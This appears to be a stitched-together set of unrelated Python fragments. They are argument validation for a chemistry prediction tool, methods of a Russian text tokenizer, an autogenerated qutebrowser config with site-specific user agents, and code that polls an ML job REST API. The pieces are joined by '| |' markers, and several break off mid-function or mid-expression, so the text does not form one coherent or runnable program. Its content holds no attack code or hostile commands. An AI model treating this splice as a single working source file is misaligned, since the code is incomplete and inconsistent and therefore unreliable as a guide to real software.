self.metric = 'rmse'
else:
raise ValueError(f'Dataset type {self.dataset_type} is not supported.')
if self.metric in self.extra_metrics:
raise ValueError(f'Metric {self.metric} is both the metric and is in extra_metrics. '
f'Please only include it once.')
for metric in self.metrics:
if not any([(self.dataset_type == 'classification' and metric in ['auc', 'prc-auc', 'accuracy', 'binary_cross_entropy', 'f1', 'mcc']),
(self.dataset_type == 'regression' and metric in ['rmse', 'mae', 'mse', 'r2', 'bounded_rmse', 'bounded_mae', 'bounded_mse']),
(self.dataset_type == 'multiclass' and metric in ['cross_entropy', 'accuracy', 'f1', 'mcc']),
(self.dataset_type == 'spectra' and metric in ['sid','wasserstein'])]):
raise ValueError(f'Metric "{metric}" invalid for dataset type "{self.dataset_type}".')
if self.loss_function is None:
if self.dataset_type == 'classification':
self.loss_function = 'binary_cross_entropy'
elif self.dataset_type == 'multiclass':
self.loss_function = 'cross_entropy'
elif self.dataset_type == 'spectra':
self.loss_function = 'sid'
elif self.dataset_type == 'regression':
self.loss_function = 'mse'
else:
raise ValueError(f'Default loss function not configured for dataset type {self.dataset_type}.')
if self.loss_function != 'bounded_mse' and any(metric in ['bounded_mse', 'bounded_rmse', 'bounded_mae'] for metric in self.metrics):
raise ValueError('Bounded metrics can only be used in conjunction with the regression loss function bounded_mse.')
# Validate class balance
if self.class_balance and self.dataset_type != 'classification':
raise ValueError('Class balance can only be applied if the dataset type is classification.')
# Validate features
if self.features_only and not (self.features_generator or self.features_path):
raise ValueError('When using features_only, a features_generator or features_path must be provided.')
# Handle FFN hidden size
if self.ffn_hidden_size is None:
self.ffn_hidden_size = self.hidden_size
# Handle MPN variants
if self.atom_messages and self.undirected:
raise ValueError('Undirected is unnecessary when using atom_messages '
'since atom_messages are by their nature undirected.')
# Validate split type settings
if not (self.split_type == 'predetermined') == (self.folds_file is not None) == (self.test_fold_index is not None):
raise ValueError('When using predetermined split type, must provide folds_file and test_fold_index.')
if not (self.split_type == 'crossval') == (self.crossval_index_dir is not None):
raise ValueError('When using crossval split type, must provide crossval_index_dir.')
if not (self.split_type in ['crossval', 'index_predetermined']) == (self.crossval_index_file is not None):
raise ValueError('When using crossval or index_predetermined split type, must provide crossval_index_file.')
if self.split_type in ['crossval', 'index_predetermined']:
with open(self.crossval_index_file, 'rb') as rf:
self._crossval_index_sets = pickle.load(rf)
self.num_folds = len(self.crossval_index_sets)
self.seed = 0
# Validate split size entry and set default values
if self.split_sizes is None:
if self.separate_val_path is None and self.separate_test_path is None: # separate data paths are not provided
self.split_sizes = (0.8, 0.1, 0.1)
elif self.separate_val_path is not None and self.separate_test_path is None: # separate val path only
self.split_sizes = (0.8, 0., 0.2)
elif self.separate_val_path is None and self.separate_test_path is not None: # separate test path only
self.split_sizes = (0.8, 0.2, 0.)
else: # both separate data paths are provided
self.split_sizes = (1., 0., 0.)
else:
if sum(self.split_sizes) != 1.:
raise ValueError(f'Provided split sizes of {self.split_sizes} do not sum to 1.')
if len(self.split_sizes) not in [2,3]:
raise ValueError(f'Three values should be provided for train/val/test split sizes. Instead received {len(self.split_sizes)} value(s).')
if self.separate_val_path is None and self.separate_test_path is None: # separate data paths are not provided
if len(self.split_sizes) != 3:
raise ValueError(f'Three values should be provided for train/val/test split sizes. Instead received {len(self.split_sizes)} value(s).')
if 0. in self.split_sizes:
raise ValueError(f'Provided split sizes must be nonzero if no separate data files are provided. Received split sizes of {self.split_sizes}.')
elif self.separate_val_path is not None and self.separate_test_path is None: # separate val path only
if len(self.split_sizes) == 2: # allow input of just 2 values
self.split_sizes = (self.split_sizes[0], 0., self.split_sizes[1])
if self.split_sizes[0] == 0.:
raise ValueError('Provided split size for train split must be nonzero.')
if self.split_sizes[1] != 0.:
raise ValueError('Provided split size for validation split must be 0 because validation set is provided separately.')
if self.split_sizes[2] == 0.:
raise ValueError('Provided split size for test split must be nonzero.')
elif self.separate_val_path is None and self.separate_test_path is not None: # separate test path only
if len(self.split_sizes) == 2: # allow input of just 2 values
self.split_sizes = (self.split_sizes[0], self.split_sizes[1], 0.)
if self.split_sizes[0] == 0.:
raise ValueError('Provided split size for train split must be nonzero.')
if self.split_sizes[1] == 0.:
raise ValueError('Provided split size for validation split must be nonzero.')
if self.split_sizes[2] != 0.:
raise ValueError('Provided split size for test split must be 0 because test set is provided separately.')
else: # both separate data paths are provided
if self.split_sizes != (1., 0., 0.):
raise ValueError(f'Separate data paths were provided for val and test splits. Split sizes should not also be provided.')
# Test settings
if self.test:
self.epochs = 0
# Validate features are provided for separate validation or test set for each of the kinds of additional features
for (features_argument, base_features_path, val_features_path, test_features_path) in [
('`--features_path`', self.features_path, self.separate_val_features_path, self.separate_test_features_path),
('`--phase_features_path`', self.phase_features_path, self.separate_val_phase_features_path, self.separate_test_phase_features_path),
('`--atom_descriptors_path`', self.atom_descriptors_path, self.separate_val_atom_descriptors_path, self.separate_test_atom_descriptors_path),
('`--bond_features_path`', self.bond_features_path, self.separate_val_bond_features_path, self.separate_test_bond_features_path)
]:
if base_features_path is not None:
if self.separate_val_path is not None and val_features_path is None:
raise ValueError(f'Additional features were provided using the argument {features_argument}. The same kinds of features must be provided for the separate validation set.')
if self.separate_test_path is not None and test_features_path is None:
raise ValueError(f'Additional features were provided using the argument {features_argument}. The same kinds of features must be provided for the separate test set.')
# validate extra atom descriptor options
if self.overwrite_default_atom_features and self.atom_descriptors != 'feature':
raise NotImplementedError('Overwriting of the default atom descriptors can only be used if the'
'provided atom descriptors are features.')
if not self.atom_descriptor_scaling and self.atom_descriptors is None:
raise ValueError('Atom descriptor scaling is only possible if additional atom features are provided.')
# validate extra bond feature options
if self.overwrite_default_bond_features and self.bond_features_path is None:
raise ValueError('If you want to overwrite the default bond descriptors, '
'a bond_descriptor_path must be provided.')
if not self.bond_feature_scaling and self.bond_features_path is None:
| |
str) else
pars,
start=par_no1
):
assert isinstance(text, str), \
"ERROR: text must be of 'str' type (line {})" \
.format(i)
if text:
pars_.append({'text': self.RE_LF2.sub(
r'\g<1> \g<2>', self.RE_LF.sub(r'\g<1> ', text)
).replace('\n', '. ').replace('\r', '')})
par_no2 += 1
return (par_no1, par_no2) if par_no2 >= par_no1 else (None, None)
def load_pars(self, path, encoding='utf-8-sig', eop=r'\n', doc_id=None):
"""Load a text, split it into paragraphs, and put to the document.
:param path: a name of a file in txt format
:param eop: param for ``text_to_pars()``
:param doc_id: id of the document. If None then new document will be
created
:type doc_id: str
:return: lower and higher numbers of paragraphs created
:rtype: tuple(int, int)
"""
res = (None, None)
print('Load corpus...', end=' ', file=LOG_FILE)
LOG_FILE.flush()
with open(path, mode='rt', encoding=encoding) as f:
res = self.new_pars(list(self.text_to_pars(f.read(), eop=eop)),
doc_id)
print('done.', file=LOG_FILE)
return res
@staticmethod
def text_to_pars(text, eop=r'\n'):
"""Just split a *text* into paragraphs by a given rule. Empty
paragraphs will be skipped.
:param text: text to split
:type text: str
:param eop: regex or function for splitting a *text*. If None then
all the *text* will be placed into one paragraph. Default
is LF symbol
:type eop: str|callable
:rtype: iter(list(str))
"""
return filter(bool, map(lambda x: x.strip(),#.replace('\u00A0', ' '),
eop(text) if callable(eop) else
re_split(eop, text))) if eop else \
[text]
def _unescape_html(self, text):
"""Convert html entities (>, >, &x3e;) to the corresponding
characters"""
#text = re_sub(r'(&[a-z]+;)', r' \g<1> ', text)
return unescape(text)
def _preprocess_emoji_default(self, text):
"""Depending on CHAR_DELIM symbol, replace emojis of type ":-\" to
":-/" (for '\\') or ":-|" to ":-!" (for '|')"""
return re_sub(r'(^|\s|' + self.CHAR_ALNUM
+ r')(:-?\\+)(\s|$)', r'\g<1>:-/\g<3>', text) \
if self.CHAR_DELIM == '\\' else \
re_sub(r'(^|\s|' + self.CHAR_ALNUM \
+ r')(:-?\|)(\s|$)', r'\g<1>:-!\g<3>', text) \
if self.CHAR_DELIM == '|' else \
text
def _remove_delims(self, text, sub=' '):
"""Remove a characters further using for a tagging from a *text*.
If *delim* is None, using a value set during ``__init__()``.
:param text: text to process
:type text: str
:param sub: substitute for a removing characters
:type sub: str
"""
return self._preprocess_emoji_default(text) \
.replace(self.CHAR_DELIM, sub)
    def _tag_emoji(self, text):
        """Append ``TAG_EMOJI`` after every emoji matched by ``RE_EMOJI``.

        NOTE: Some emojis may become corrupted after ``remove_delims()``.
        You need to change them prior. For default *delim* symbol just run
        ``preprocess_emoji_default()`` before ``remove_delims()``
        TODO: Need to add more complete emojis support"""
        # RE_EMOJI is a union of alternatives, each capturing its emoji in
        # a different group (2, 5, 8, 10, 12, 15, 16 or 19) together with
        # surrounding context groups; only the branch whose group matched
        # contributes to the replacement, all other branches yield ''.
        text = self.RE_EMOJI.sub(
            lambda x:
                (x.group(1) + ' ' + x.group(2) + self.TAG_EMOJI + ' '
                     + x.group(3)
                 if x.group(2) else '')
                + (x.group(4) + x.group(5) + self.TAG_EMOJI + ' ' + x.group(6)
                   if x.group(5) else '')
                + (x.group(7) + ' ' + x.group(8) + self.TAG_EMOJI + ' '
                       + x.group(9)
                   if x.group(8) else '')
                + (' ' + x.group(10) + self.TAG_EMOJI + ' '
                   if x.group(10) else '')
                + (x.group(11) + ' ' + x.group(12) + self.TAG_EMOJI + ' '
                   if x.group(12) else '')
                + (x.group(13) + x.group(14) + ' ' + x.group(15)
                       + self.TAG_EMOJI + ' '
                   if x.group(15) else '')
                + (' ' + x.group(16) + self.TAG_EMOJI + ' ' + x.group(17)
                       + x.group(18)
                   if x.group(16) else '')
                # group 19: a yandex emoji name, prefixed with 'yandex_'
                + (' yandex_' + x.group(19) + self.TAG_EMOJI
                   if x.group(19) else ''),
            text
        )
        return text
def _tag_email(self, text):
text = self.RE_EMAIL.sub(r' \g<1>@\g<2>' + self.TAG_EMAIL + ' ', text)
return text
def _tag_xml(self, text):
text = self.RE_XML.sub(r' \g<1>\g<2>' + self.TAG_XML + ' ', text)
return text
    def _tag_uri(self, text):
        """Mark URIs (web addresses, cyrillic-zone hosts, ip-based uris,
        urn's) found in *text* with ``TAG_URI``."""
        def process(match):
            # RE_URI group layout, per the unpacking below: the whole uri,
            # leading garbage, scheme, scheme tail, user login/password,
            # host, port, path, params, query and fragment.
            uri, garbage, scheme, scheme_tail, user_login, user_passwd, \
                host, port, path, params, query, fragment = match.groups()
            scnt = scheme.count(':') if scheme else -1
            hcnt = host.count('.') if host else -1
            isuri = (
                scheme and (path or query)
            ) or (
                # there is a scheme and the host contains at least one dot;
                # additionally, the host's domain consists of latin letters
                # only, or belongs to known cyrillic zones, or the host is
                # exactly 4 numbers (an ip address)
                ((scheme and hcnt >= 0) or hcnt >= 2) and re_search(r'''(?xiu)
                    ^
                    (?:
                        (?:
                            (?: [ёа-я]+ [.-]? )?    # head
                            # only ascii
                            (?: [0-9a-z][0-9a-z-]*\. )*
                            (?: [a-z][a-z-]+ )    # java errors included
                            # '{1,10}' instead of '+' for http uris
                        )|(?:
                            # known cyrillic zones
                            (?:
                                (?:
                                    [0-9a-z][0-9a-z-]*
                                |
                                    [0-9ёа-я][0-9ёа-я-]*
                                )
                                \.
                            )+
                            (?: бг | бел | рф | срб | укр )  # don't add 'ru'!
                        )
                    )
                    (?: [.-] [ёа-я]+ )?    # tail
                    $
                ''', host)
            ) or (
                # <scheme>://<ip-addr>
                scheme and scheme_tail and hcnt == 3
                    and not re_search('[^0-9.]', host)
                    and reduce(lambda y, x: x >= 0 and x <= 255 and y,
                               map(int, re_findall(r'\b(\d{1,3})\b', host)), True)
            ) or (
                # support urn's
                scnt >= 2 and host
            )
            # workaround for english names:
            # NOTE(review): 'toks' is assigned but never used
            toks = match.group(0).split('.')
            if re_match('(?:[A-Z]\.){1,4}[A-Z][A-Za-z]+', match.group(0)):
                # abbreviated names like "J.R.R.Tolkien": just add spaces
                res = match.group(0).replace('.', '. ')
            elif isuri:
                head = tail = None
                if host and not (scheme and user_login and user_passwd):
                    # a cyrillic prefix glued to the host is split off and
                    # kept outside of the tagged uri
                    head = re_search('^([ёа-я]+[.-]?)[0-9a-z]', host)
                    if head:
                        head = head.group(1)
                        uri = uri[len(head):]
                if path or params or query or fragment:
                    # trailing punctuation (and glued cyrillic letters) is
                    # not part of the uri
                    tail = re_search('(?i)([.,:;!()-]+[ёа-я]*)$', uri)
                elif host:
                    tail = re_search(
                        '(?i)(?=(?!\.(?:бг|бел|рф|срб|укр)$))([.-][ёа-я]+)$',
                        uri
                    )
                if tail:
                    tail = tail.group(1)
                    #uri = uri.rsplit(tail, 1)[0]
                    uri = uri[:-len(tail)]
                if garbage:
                    uri = uri[len(garbage):]
                res = (garbage if garbage else '') \
                    + (head if head else '') \
                    + ' ' + uri + self.TAG_URI + ' ' \
                    + (tail if tail else '')
            else:
                res = match.group(0)
            return res
        text = self.RE_URI.sub(process, text)
        return text
def _tag_phone(self, text):
def process(match):
pre, p1, p2, p3, p4, p5, post = match.groups()
if p1 not in ('', '+7', '7', '8'):
res = match.group(0)
else:
phone = p2 + p3 + p4 + p5
if len(phone) == 11 and phone[0] in ('7', '8'):
phone = phone[1:]
res = '{} +7{}{} '.format(pre, phone, self.TAG_PHONE) \
if len(phone) == 10 else match.group(0)
return res
text = self.RE_PHONE.sub(process, text)
return text
def _tag_date(self, text):
def process(match):
res = match.group(0)
d, m, y = int(match.group(1)), int(match.group(2)), match.group(3)
if len(y) == 2: y = '20' + y
y = int(y)
end = match.group(4)
try:
if y > 1900 and y < 2030:
res = ' ' + str(datetime.date(y, m, d)) + self.TAG_DATE + \
' ' + (end if end else '')
except ValueError:
pass
return res
text = self.RE_DATE.sub(process, text)
return text
def _tag_hashtag(self, text):
text = self.RE_HASHTAG.sub(
r'\g<1> \g<2>' + self.TAG_HASHTAG + ' ', text
)
return text
def _tag_nametag(self, text):
text = self.RE_NAMETAG.sub(
r'\g<1> \g<2>' + self.TAG_NAMETAG + ' ', text
)
return text
def _tag_quotation(self, text):
def process(match):
res = match.group(0)
for i in range(1, 12, 3):
q1 = match.group(i)
if q1:
q2, q3 = match.group(i + 1), match.group(i + 2)
res = q1 + self.TAG_QUOTATION_START + ' ' \
+ q2 + ' ' \
+ q3 + self.TAG_QUOTATION_END + ' '
break
return res
text = self.RE_QUOTATION.sub(process, text)
return text
def norm_punct(self, text, islf_eos=True, istab_eos=True,
ignore_case=False):
"""Some heuristics to normalize Russian punctuation. Use it for chat
or forum messages where illiterate people are prevail. If your content
is already correct, you don't need this method.
:param islf_eos: LF symbol marks end of sentence; replace to "."
:param istab_eos: TAB symbol marks end of sentence; replace to "."
:param ignore_case: do not consider character case during processing
"""
flags = re.I if ignore_case else 0
if islf_eos:
text = text.replace('\n', ' . ')
if istab_eos:
text = text.replace('\t', ' . ')
wform_isknown = self.wform_isknown
# ; -> .
text = text.replace(';', ' . ')
# пробелы между знаками препинания
_chars_punct = '([' + self.CHARS_PUNCT + '])'
_chars_punct += '\s+' + _chars_punct
text = re_sub(_chars_punct, r'\g<1>\g<2>', text)
text = re_sub(_chars_punct, r'\g<1>\g<2>', text) # sic!
# лишние запятые
text = re_sub(r',*([.!?]),*', r'\g<1>', text)
# необычные сочетания всяких символов - конец предложения
text = re_sub(r'---+|,,,+|~+|\'\'\'+|"""+|№№№+', r' . ', text)
# два символа - в один
text = text.replace(r'--', r' - ')
text = text.replace(r"''", r' " ')
text = text.replace(r'""', r' " ')
text = re_sub(r',,?', r' , ', | |
# Autogenerated config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Change the argument to True to still load settings configured via autoconfig.yml
config.load_autoconfig(False)
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {'w': 'session-save', 'q': 'quit', 'wq': 'quit --save'}
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebEngine and QtWebKit (not
# recommended). QtWebEngine is Qt's official successor to QtWebKit, and
# both the default/recommended backend. It's based on a stripped-down
# Chromium and regularly updated with security fixes and new features by
# the Qt project: https://wiki.qt.io/QtWebEngine QtWebKit was
# qutebrowser's original backend when the project was started. However,
# support for QtWebKit was discontinued by the Qt project with Qt 5.6 in
# 2016. The development of QtWebKit was picked up in an official fork:
# https://github.com/qtwebkit/qtwebkit - however, the project seems to
# have stalled again. The latest release (5.212.0 Alpha 4) from March
# 2020 is based on a WebKit version from 2016, with many known security
# vulnerabilities. Additionally, there is no process isolation and
# sandboxing. Due to all those issues, while support for QtWebKit is
# still available in qutebrowser for now, using it is strongly
# discouraged.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium - recommended).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari - many known security issues!).
c.backend = 'webengine'
# Always restore open sites when qutebrowser is reopened. Without this
# option set, `:wq` (`:quit --save`) needs to be used to save open tabs
# (and restore them), while quitting qutebrowser in any other way will
# not save/restore the session. By default, this will save to the
# session which was last loaded. This behavior can be customized via the
# `session.default_name` setting.
# Type: Bool
c.auto_save.session = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'devtools://*')
# Default encoding to use for websites. The encoding must be a string
# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Allow websites to share screen content.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-GB,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version} Edg/{upstream_browser_version}', 'https://accounts.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
# | |
= ""
job_status = "unknown"
as_json = True
record = {}
if as_json:
record = json.loads(get_response.text)
job_status = str(record["job"]["status"]).strip().lstrip().lower()
# end of as_json
if job_status == "requested":
if last_status != job_status:
lg("Job=" + str(job_id) + " is requested - Step: 0/10", 5)
if use_progres_widget:
progress.value = 0
elif job_status == "initial":
if last_status != job_status:
lg("Job=" + str(job_id) + " is initial - Step 1/10", 5)
if use_progres_widget:
progress.value = 1
elif job_status == "active":
if last_status != job_status:
lg("Job=" + str(job_id) + " is active - Step 2/10", 5)
if use_progres_widget:
progress.value = 2
elif job_status == "training":
if last_status != job_status:
lg("Job=" + str(job_id) + " is training - Step 3/10", 5)
if use_progres_widget:
progress.value = 3
elif job_status == "predicting":
if last_status != job_status:
lg("Job=" + str(job_id) + " is predicting - Step 4/10", 5)
if use_progres_widget:
progress.value = 4
elif job_status == "analyzing":
if last_status != job_status:
lg("Job=" + str(job_id) + " is analyzing - Step 5/10", 5)
if use_progres_widget:
progress.value = 5
elif job_status == "caching":
if last_status != job_status:
lg("Job=" + str(job_id) + " is caching - Step 6/10", 5)
if use_progres_widget:
progress.value = 6
elif job_status == "plotting":
if last_status != job_status:
lg("Job=" + str(job_id) + " is plotting - Step 7/10", 5)
if use_progres_widget:
progress.value = 7
elif job_status == "emailing":
if last_status != job_status:
lg("Job=" + str(job_id) + " is emailing - Step 8/10", 5)
if use_progres_widget:
progress.value = 8
elif job_status == "uploading":
if last_status != job_status:
lg("Job=" + str(job_id) + " is uploading - Step 9/10", 5)
if use_progres_widget:
progress.value = 9
elif job_status == "archiving":
if last_status != job_status:
lg("Job=" + str(job_id) + " is archiving - Step 10/10", 5)
if use_progres_widget:
progress.value = 10
elif job_status == "completed":
if use_progres_widget:
progress.value = 10
progress.bar_style = 'success'
not_done = False
lg("Job=" + str(job_id) + " completed", 5)
end_time = datetime.datetime.now()
prefix_label = "Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " after waiting " + str((end_time - start_time).total_seconds())[0:5] + "s"
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status)
if use_progres_widget:
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
elif job_status == "cancelled":
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " cancelled", 5)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
elif job_status == "error":
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " error", 5)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
else:
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " in unexpected status=" + str(job_status) + "", 0)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
# end of if/else
last_status = job_status
# end of post for running an ML Job
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
if not_done:
sleep(sleep_interval)
# end of while not_done
except Exception as w:
status = "Exception"
err_msg = "Failed waiting on job=" + str(job_id) + " with Ex=" + str(w)
lg(err_msg, 0)
end_time = datetime.datetime.now()
if use_progres_widget:
progress.bar_style = 'danger'
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Error waiting on job=" + str(job_id) + " status=" + str(status) + " progress=" + str(progress.value) + "/" + str(total_steps) + " hit Exception: " + str(w)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
# end of try/ex
results = {
"status" : status,
"error" : err_msg,
"record" : record
}
return results
# end of wait_on_job
def wait_for_job_to_finish(job_id):
    """Poll the ML job REST resource until the job reaches a terminal state.

    Re-authenticates on every poll (tokens can expire while waiting) and
    retries transient HTTP failures up to ``max_retries`` times before
    giving up.

    :param job_id: id of the ML job to wait for
    :return: dict with keys ``status`` ("SUCCESS", "Failed" or
             "Exception"), ``error`` (message, empty on success) and
             ``record`` (the last job record fetched from the API)
    """
    status = "Failed"
    err_msg = ""
    record = {}
    results = {}
    # Non-terminal job states mapped to the progress message to log.
    running_states = {
        "requested": "is requested - Step: 0/10",
        "initial": "is initial - Step 1/10",
        "active": "is active - Step 2/10",
        "training": "is training - Step 3/10",
        "predicting": "is predicting - Step 4/10",
        "analyzing": "is analyzing - Step 5/10",
        "caching": "is caching - Step 6/10",
        "plotting": "is plotting - Step 7/10",
        "emailing": "is emailing - Step 8/10",
        "uploading": "is uploading - Step 9/10",
        "archiving": "is archiving - Step 10/10",
    }
    try:
        query_params = {}
        post_data = {}
        resource_url = rt_url + "/ml/" + str(job_id) + "/"
        lg("Waiting on job=" + str(job_id) + " url=" + str(resource_url), 5)
        max_retries = 10
        retry = 0
        sleep_interval = 1.0
        not_done = True
        while not_done:
            # re-authenticate on each poll; long jobs can outlive a token
            user_token = rest_login_as_user(rt_user, rt_pass, rt_url)
            auth_headers = {
                "Authorization": "JWT " + str(user_token)
            }
            get_response = requests.get(resource_url, params=query_params,
